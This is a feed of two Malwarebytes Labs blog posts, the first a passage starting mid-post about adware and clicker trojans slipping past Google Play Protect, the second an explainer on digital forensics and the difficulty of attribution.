Most come in the form of a PUP subcategory known as adware. Ads aren’t inherently malicious, and many apps from the Google Play Store have ads to keep the apps free. There’s a thin line between a good ad and what we call adware. If the ad behavior starts acting overly aggressive or does something out of line like collecting overly personal information, it’s considered adware. The uncertainty of whether an ad is good or not can mean adware can slip into Google Play undetected for long periods of time. If my hunch is correct, these apps would also be in the machine learner’s “good” group if they made it into Google Play.

Clickers, too

Another concern is the more malicious Trojan.Clicker. This malware simply “clicks” on ad websites in the background repeatedly to gain revenue. The simplicity of the code makes it difficult to detect. Malicious clicker apps have been known to slip into Google Play.

Kudos to Google

I, for one, am very happy to see Google taking more steps to keep users safe. Concerning machine learning, the more data you have, the better it will be at detecting. Google has an abundance of data, which gives me high hopes of its abilities.

As a malware researcher, should I start beefing up my resume to find a new field now that Google is on the case? Not likely, as malware authors have found and always will find ways around detection. The new scanner will indeed help things, but it certainly isn’t a stop-all for mobile malware. Trust me, if I could retire from the mobile malware industry knowing the world is safe to a less stressful job as a goat herder, I would. Until then, stay safe out there.

Nathan Collier

The post Mobile Menace Monday: Implications of Google Play Protect appeared first on Malwarebytes Labs.

Explained: digital forensics

Malwarebytes - Fri, 08/25/2017 - 15:30

What is it?

Digital forensics is a modern day field of forensic science, which deals with the recovery and investigation of material found in digital devices. When needed, this is often because of a (cyber) crime, whether suspected or established. The most common reasons for performing digital forensics are:

  • attribution
  • identifying a leak within an organization
  • assessing the possible damage that occurred during a breach

The field of digital forensics is divided up into several subdivisions, depending on the nature of the digital device that is the subject of the investigation:

  • computer forensics
  • network forensics
  • forensic data analysis
  • mobile device forensics

What does it take?

Working in this field combines the excitement of solving a puzzle with the data at hand and requires a deep understanding of the software and hardware involved. The most important skill is to be able to find and interpret the data involved in the crime while minimizing the changes made on the investigated device.

Cause and effect can be difficult to determine without a clear timeline, which adds another dimension to the puzzle of trying to figure out what the initial breach factor was and how the attackers proceeded from there.

What does it have in common with cybersecurity?

Cybersecurity and digital forensics are two fields that have a lot in common. They also provide information to each other. Analyzing a breach may lead to new insights about preventing such a breach, and knowing how certain threats work makes it easier to create a timeline and look for a possible attack vector.

Is attribution always possible?

If anything, attribution is always tough. Sometimes, you can recognize a certain way of programming, but there is no way of telling whether that person wrote that piece of code for this purpose or if someone simply copied it. Attribution by metadata is sometimes possible, but experienced cybercriminals are oftentimes too smart to leave evidence behind. Who benefits from the data that were stolen or destroyed is usually a better indicator of who might be responsible, but motive alone does not count in court.

Conclusion

Digital forensics is a science that is closely related to cybersecurity. Digital forensic analysts examine data and devices to find out as much as possible about a breach or crime that involved digital devices.

Pieter Arntz

The post Explained: digital forensics appeared first on Malwarebytes Labs.
